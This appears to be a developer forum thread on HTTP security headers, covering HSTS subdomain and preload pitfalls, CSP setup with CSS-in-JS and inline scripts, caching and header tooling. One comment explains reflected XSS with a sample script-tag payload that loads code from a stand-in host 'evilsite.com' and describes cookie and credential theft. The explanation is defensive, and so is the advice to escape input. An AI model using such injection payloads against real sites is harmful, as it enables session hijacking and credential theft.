I'm going to recommend this to them, but I do think I need to explain a couple of things the article is not clear about:
- Be sure that you understand the concept of HSTS! Simply copy/pasting the example from this article will completely break subdomains that are not HTTPS-enabled, and preloading will break them permanently. I wish the authors had made that clearer. Don't use includeSubDomains or preload unless you know what you are doing (see the header sketch after this list). Scott Helme also wrote a great article about this.
- CSP can be really hard to set up. For instance, if you include Google Analytics, you need to set both a script-src and an img-src (sketched below). The article does a good job of explaining that you should use CSP monitoring (I recommend Sentry), but it doesn't explain how deceptive the reports can be. You'll get tons of CSP violation reports caused by browser plugins attempting to inject CSS or JS. You must learn to distinguish the errors you can fix from those that are out of your control.
- Modern popular frontend frameworks will be broken by CSP, as they rely heavily on injecting CSS at runtime (a concept known as JSS or 'styled components'). As these techniques are often adopted by less experienced devs, you'll see many 'solutions' on StackOverflow and GitHub telling you to set unsafe-inline in your CSP. This is bad advice, as it basically disables CSP! I have attempted to raise awareness in the past, but I always got the 'you're holding it wrong' reply (even on HN). The real solution is for your build system to separate the CSS from the JS at build time. Not many popular build systems (such as create-react-app) support this.
- Cache control can be really hard too. If you don't have time to fiddle with these settings, I recommend using a host like Netlify; in my experience they do a proper job of caching.
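To make the first two bullets concrete, here is a minimal sketch using Node's built-in http module (the Google Analytics hostname is an assumption; check which hosts your pages actually load from):

    import http from "http";

    http.createServer((req, res) => {
      // Conservative HSTS: one year, no includeSubDomains, no preload.
      res.setHeader("Strict-Transport-Security", "max-age=31536000");
      // CSP permitting Google Analytics scripts and tracking pixels.
      res.setHeader(
        "Content-Security-Policy",
        "default-src 'self'; " +
          "script-src 'self' https://www.google-analytics.com; " +
          "img-src 'self' https://www.google-analytics.com"
      );
      res.end("ok");
    }).listen(8080);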
Great point, and it's even more important than people might realize when first reading your comment: it doesn't cover only your web properties; it covers all subdomains, even the ones you forgot you use and don't associate with your web presence.
You have a NAS at nas.example.com, a webmail at mail.example.com, a third-party CDN or similar routing at cdn.example.com, a printer interface at printer.office.example.com, and other internal things on internally routed paths, like that custom old dashboard written 15 years ago? includeSubDomains covers them all, and preloading means you can't disable it once you realize you shouldn't have done it.
I've seen a few small non-IT companies hit by that, then scrambling for urgent consultancy to fix it.
If it is preloaded (as the article suggests you should do), there is nothing you can do to 'fix' it except migrating all the other subdomains to HTTPS, which is not always possible.
Also, no mention of ETags. They help with caching.
+1. I'm kind of worried that the default copy-pasteable snippet there can lead to serious consequences. Less so today, when you can get certs for free, but you may still face some unpleasant downtime.
The real solution is to fix the actual protocol issues, instead of imposing arbitrary limitations on what scripts can do with the page. If you pause and think about what these security measures are aiming to mitigate, they themselves are at best amateurish.
As a motivator, I always say: look at the network tab and think about how you can make stuff faster. It was in this mindset that I first saw these additional requests and thought 'WTF, I'd better find out why this is happening.' They turned out to be preflight requests.
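If you want to see one yourself, a cross-origin request with a non-"simple" header is enough to trigger it (the URL below is a placeholder):

    // Run in the browser console while watching the network tab: the
    // Content-Type below is not a "simple" value, so the browser sends
    // OPTIONS https://api.example.com/items (the preflight) first, and
    // only sends the POST if the preflight response allows it.
    fetch("https://api.example.com/items", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ q: "test" }),
    });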
Reinventing the wheel is also a good way to fool yourself into thinking you're being clever and productive. I mean, it's as if everyone who preceded me in a field was incapable of seeing a problem I've managed to find a hacky solution to in 5 minutes.
Meanwhile, let's not forget that there are currently about half a dozen standards and specifications for HATEOAS, all involving ugly hacks around response documents and funny media types, when all it takes to achieve the same goal is passing link relations through Link headers.
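A sketch of that idea (Node; the paths and link relations are invented): per RFC 8288 the relations travel in an ordinary Link header, so the response body can stay a plain document.

    import http from "http";

    http.createServer((req, res) => {
      // The client discovers related resources from the header alone.
      res.setHeader(
        "Link",
        '</orders/123>; rel="self", </orders/123/items>; rel="items", ' +
          '</orders/124>; rel="next"'
      );
      res.setHeader("Content-Type", "application/json");
      res.end(JSON.stringify({ id: 123, status: "shipped" }));
    }).listen(8080);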
Not sure what you mean by this paragraph. JSS and styled-components are both specific JS libraries that provide a way to write styles in JS and compile them to normal CSS. They both support normal server-side rendering of CSS that can be included in the HTML like any traditional web page.
The general term for this concept is “CSS-in-JS.” The libraries do not rely on inline styles, even though the general term may suggest that.
I’m not very familiar with JSS, but styled-components absolutely supports building CSS in create-react-app.
The problem is that JSS injects the CSS dynamically at runtime. There seems to be no real solution to extract the CSS into a .css file at compile time.
The only solution the JSS developers suggest is using server-side rendering to inject a nonce into the HTML script tag to satisfy the CSP. But I think that requiring server-side rendering for a client-side rendered framework is totally backwards. The whole reason I use single-page, client-side rendered applications is so I can deploy to a CDN.
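For reference, the nonce approach looks roughly like this (a hand-written sketch, not JSS's actual API; the nonce must be freshly generated per request, and the same value goes into both the header and the tag):

    import http from "http";
    import { randomBytes } from "crypto";

    http.createServer((req, res) => {
      const nonce = randomBytes(16).toString("base64"); // fresh per request
      res.setHeader(
        "Content-Security-Policy",
        `script-src 'nonce-${nonce}'; style-src 'nonce-${nonce}'`
      );
      res.setHeader("Content-Type", "text/html");
      // Only tags carrying this nonce may execute or apply; styles injected
      // at runtime still need the nonce propagated to them.
      res.end(`<script nonce="${nonce}">console.log("allowed");</script>`);
    }).listen(8080);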
It's not always obvious, because your gut reaction is "oh, my web site is on www.", but that misconfigured naked-domain redirect might indeed break "randomservice.example.com".
Are you or they able to elaborate on that? Headers are an active area of research/implementation for web security, are they working on any replacement to the entire concept?
Instead of using HSTS, you can also simply redirect any HTTP request to HTTPS. That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.
With HSTS, once they've connected to the server over HTTPS once (e.g. at home), every connection from that browser will be immediately upgraded to HTTPS before even trying HTTP.
Your suggestion is valid - as HSTS is only delivered over HTTPS, the redirect is still required the first time.
See Firesheep for an example of how HTTP can be intercepted - https://en.wikipedia.org/wiki/Firesheep
HSTS is designed to prevent this.
But even without preloading, HSTS improves security. Yes, the first visit is susceptible to MITM, but every visit after that is not. This makes things a lot more difficult for an attacker, as they must intercept the very first visit for the attack to work.
And even if it is not preloaded, it's still helpful for people connecting to your site again.
I think this comment sums up my whole point about how less experienced developers must learn how to use headers.
As others have commented, HSTS is used to fix the potential dangers of forwarding (MITM attacks); it also reduces overhead.
> That way, you are certain that HTTPS is used, even if a browser does not understand HSTS.
If you use HSTS, you should always use a 301 permanent redirect as a fallback for old browsers and other HTTP clients (like some libcurl implementations).
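A minimal sketch of that fallback (Node; hostname and port are placeholders). The plain-HTTP listener does nothing but redirect; the HSTS header itself belongs on the HTTPS responses, since browsers ignore it over plain HTTP:

    import http from "http";

    // Plain-HTTP side: nothing but a permanent redirect to HTTPS.
    http.createServer((req, res) => {
      res.writeHead(301, { Location: `https://example.com${req.url}` });
      res.end();
    }).listen(80);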
If MITM is a serious issue then it's an extremely bad idea to depend on individual developers of every website out there to mitigate this.
Bonus if your URLs get rewritten by something client-side, which is exactly what HSTS is supposed to protect against and a redirect does not.
There are backend band-aids and frontend band-aids, but with the sheer amount of stack and framework knowledge required to do anything as a webdev these days, there's no way to stay on top of it all, and we are just kinda winging some combination of best practices and getting shit done.
I don't know if things like PWAs and WASM are going to allow us to move towards a change yet, and I would love input from someone with an opinion.
I think this is greatly exaggerated. You can get by just fine making your own sites knowing some basic html/css/maybe js, maybe some php too if you want backend stuff. Optionally some frameworks if you want, which should usually be easy enough to just follow some examples and get the functionality you want pretty fast.
If you're put on an existing web project, you probably only have to learn the bits immediately surrounding the things you do, picking it up as you go along. I still don't know Angular, React, Vue, or much else in the way of JS frameworks other than jQuery after being in web dev professionally for years, as it simply hasn't been needed.
Like how many sites still don't have mandatory HTTPS even though it is free and easy?
Now, I see that I can have a conversation with the browser at a different level. Headers allow me to dictate the intricate details of how this hardened security tool (the browser) will interact with my code.
HTTP headers do appear to be a duct-tape solution. However, once you implement them and understand what is going on, your hindsight will be 20/20 and you'll probably see them differently.
From what I understand, WebAssembly doesn't have anything to do with this issue. HTTP headers are a contract between the server and client about what can happen on a webpage. WebAssembly is a binary instruction format and virtual machine that executes code; WASM code executing inside a VM would still need HTTP headers defining permissions for its actions.
My point isn't that we shouldn't learn about headers and how they can be used to help facilitate security - we should! My point is that, largely, we are trying to patch an insecure system with many different points of insecurity as we allow browsers and servers to do more and more things, and we need to think about this as a structural problem of web development, not a problem of a dev not understanding enough to set the right headers.
There's your problem!
> think about this as a structural problem of web development, not a problem of a dev not understanding enough
No, go back to your root cause and fix that.
From my research I've found that clients/managers only allow a development team to finish 15% of a feature before they consider it ready for production and demand a deployment. They don't understand security, testing, documentation, or hardening. Developers only have so much energy to roll these boulders uphill so eventually the crazy business people win. Today if you put a server on the internet you will be attacked within 20 seconds, and that will continue forever. If you start a business you have a 50% chance of being hacked. This really isn't an issue with the tools available, it's the developer effort and toxic work environment dubbed "Agile".
The web needs a real security model relevant to what browsers do today, not these piecemeal hacks duct-taped to a hypertext delivery protocol.
I am a big fan of restrictive CSPs, but it's often hard to get there from an existing site. It's often better to do it in stages: when you work on page Q, you give that page a restrictive CSP; later, when you work on page R, that page can grow one too (or at least have fewer CSP issues). If someone breaking into your site would be a serious problem, then you should speed up that process.
Somebody else mentioned Scott Helme, but didn't link to three of his amazing sites:
https://securityheaders.com which checks important headers
https://report-uri.com/ which allows sending CSP reports to catch errors. It also has a CSP builder (among a bunch of other tools) which is hugely helpful: https://report-uri.com/home/generate
https://scotthelme.co.uk/ is his blog with a ton of info. It also has a cheat sheet for CSP: https://scotthelme.co.uk/csp-cheat-sheet/
(I might be a fan of the guy ha)
CSP in particular tends to get rather long-winded. As the article says, it can contain up to 24 policies, many of which contain their own lists! It's bound to get even more complicated as web apps integrate with an ever greater number of external services. Feature-Policy also looks like it could easily balloon to 1KB or more if you wanted to control all the features. No matter how much compression you add, at some point this is going to affect the load time. Additional TCP round trips aren't cheap, especially for HTML resources that usually aren't cached at the edge.
Wouldn't it be convenient if I could store a structured representation (JSON, YAML, whatever) at a predefined location under /.well-known/ and use ordinary Cache-Control headers to make browsers cache the rules?
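Purely hypothetical, since no such spec exists today, but the document might look something like this (every name here is invented):

    // Imaginary contents of /.well-known/security-policy, fetched once
    // per origin and refreshed via ordinary Cache-Control semantics.
    const policy = {
      "content-security-policy": {
        "default-src": ["'self'"],
        "script-src": ["'self'", "https://www.google-analytics.com"],
      },
      "strict-transport-security": { "max-age": 31536000 },
      "feature-policy": { geolocation: [] },
    };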
Twitter sends over 6 KB of CSP headers on every single request. This is what happens when you run loads of different advertisement and tracking vendors.
Now I understand why HTTP/2 uses compression for HTTP headers.
Looks like it's an inside joke from Twilio.
This is why loads of devs eventually throw in the towel and disable CSP or use unsafe-inline. It's basically like trying to solve a hard CSS problem, giving up at some point, and adding !important everywhere.
It's also really, really hard to explain to customers that it takes time to set up, and that every time they install a new tracking/ad/video/whatever plugin in their CMS, you'll have to spend time adjusting the CSP accordingly.
That said, I do encourage developers to use CSP. It's a really powerful tool to secure your site and protect your visitors from fraud/phishing.
CSP headers are a very useful tool and I encourage everyone to use them. They are a PITA to set up, though. Fortunately, Firefox at least clearly communicates in the console log when a CSP rule is hit, and how to relax it (if it was triggered by mistake).
Note that CSP can be set via META tags too. There's a gotcha though: if policies are set in both places (HTTP headers and HTML META tags), the intersection of the rules is used.
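The tag form, for reference; note that per the spec some directives (frame-ancestors, report-uri, sandbox) are ignored when CSP is delivered via META:

    <meta http-equiv="Content-Security-Policy"
          content="default-src 'self'; script-src 'self'">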
Look I understand that people in general feel the need to pretend that their work is very important and good but come on. You are not working for Warchild in a Lebanese refugee camp.
Developers connect people.
Developers help people.
Developers enable people.
One of the perks was that it was something you could do mostly by yourself, without dealing with the messy and irritating mass of humanity.
I tried adopting CSPs on all my sites to the full Mozilla Observatory standard. One is a Go-based Heroku instance, where I used unrolled/secure, though there are a few different packages that achieve this. The others are static Netlify deploys using Netlify CMS. For those, you have to include a headers file (in my case I instruct Hugo to include a _headers file in the build output, which Netlify parses).
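For reference, the _headers format is just a path pattern with the headers indented under it; a minimal sketch with placeholder values:

    /*
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: default-src 'self'

Some notes from the exercise: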
- It's a huge pain in the ass / trial and error process
- The formatting of CSP rules was evidently made to be as insufferable as imaginable. Everything on one line, with commas and semicolons as the only separators; no line breaks, tabs or anything else allowed. Seriously, wtf
- When you think you've got it working, some other thing breaks in a weird, silent way
- Debugging CSPs in Firefox is nearly impossible (for certain inline scripts, you will need SHA values to tell the CSP to let them through; Chrome provides the SHA in the console, Firefox bizarrely doesn't - see the hash sketch after these notes)
- Trying to integrate Google reCAPTCHA with CSP is hilariously complicated
- You should try to host all fonts yourself, lest you need Google or Font Awesome exceptions for font, CSS, script and SVG sources, because apparently that's what it takes just to get an FB icon on your page to work
- Forget about React, or anything using inline scripts or styles. Netlify CMS and the Netlify identity widget all require inline styles and scripts. Even generating SHA values for all of those, I could not get this stuff to work. In the end I gave up and disabled the CSP again
And this is for static sites using really simple tooling. I have yet to find a viable way to make this work.
edit (some additional notes):
- Tools like this one did not generate SHA values that were accepted by the CSP. I tried a few different tools and checked all the whitespace over and over; I just couldn't get it to work. Only Chrome returned the proper SHA value.
- I tried fixing a hover state that loaded improperly (it flickered on first hover). This wasn't related to the CSP, but because I had to try lots of different things (loading an SVG sprite or a PNG sprite, pre-loading, using some JS, etc.), I had to keep changing the CSP to match. So applying a CSP should only be done at the end of a project. At the same time, if anything breaks from one day to the next, your debugging will now most likely include the CSP as well.
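On the SHA point: you can compute the value yourself instead of trusting a tool. A sketch (Node); the token is the base64-encoded SHA-256 of the script's exact text between the script tags, whitespace included, which is why copy/paste differences break it:

    import { createHash } from "crypto";

    const inlineScript = "console.log('hello');"; // the exact tag contents
    const digest = createHash("sha256")
      .update(inlineScript, "utf8")
      .digest("base64");
    console.log(`script-src 'sha256-${digest}'`); // paste into the CSP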
That's the format for HTTP headers. They could push against the standard and accept spaces, but anything else would break your browser.
Presumably that format was fine before bigger / more complex CSP rules came along?
I find it very difficult to work with visually. Hard to see where one thing stops and another starts.
If it were up to me, I would have placed the information on the linking tags inside the HTML (and JS, and CSS), or even extended the HTTP URI format in some way. There is probably a very good reason why people decided on the header, but I'm not aware of it.
The CII Best Practices Badge uses a restrictive CSP. You can see that here: https://securityheaders.com/?q=bestpractices.coreinfrastruct...
Scanner services like Mozilla Observatory, securityheaders.io, Qualys, etc. only test a preset list of known best practices; they can't judge whether a technique is applicable to a given site.
While it's usually good practice to follow the recommendations of such scanning services, you must always make sure you understand the implications.
curl -I -X GET https://example.com/
Interestingly enough, the blog this was posted on falls into the 94% that don't make the effort to use CSP!
For another example, imagine a page that includes the contents of a URL query parameter in the response. You visit www.goodsite.com/search.php?q=PurpleZebra, and the page displays "Your search for PurpleZebra did not return any results."
Now replace "PurpleZebra" in the URL with "<script src='evilsite.com/script.js'></script>" and trick someone into clicking that link - now the page delivered by goodsite.com includes the script from evilsite.com.
Either way, both allow an attacker to display content on a website when that content didn't originate from the site.
An example of how this could be really bad would be a script that deletes all of the content from the document body and replaces it with a login screen. Rather than actually logging you in, it submits the username and password you entered to a site the attacker controls.
Another, less obvious method would be a script that captures your session cookie and submits it to a site the attacker controls. If you were logged in, the attacker could use the session cookie to authenticate to the site as you without logging in.
1) Don't click on bad URLs (this should be taught in kindergarten by now).
2) Escape all input: replace < and > with &lt; and &gt;, etc. (see the sketch below).
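A sketch of both the hole and the fix from point 2 (Node; it mirrors the goodsite.com search example above):

    import http from "http";

    const escapeHtml = (s: string) =>
      s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");

    http.createServer((req, res) => {
      const q =
        new URL(req.url ?? "/", "http://localhost").searchParams.get("q") ?? "";
      res.setHeader("Content-Type", "text/html");
      // Vulnerable: res.end(`Your search for ${q} did not return any results.`);
      res.end(`Your search for ${escapeHtml(q)} did not return any results.`);
    }).listen(8080);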
I thought scripts were not able to read cookies for other domains?
Surely I'm missing something?
.dev hasn't been working locally for me for more than a year.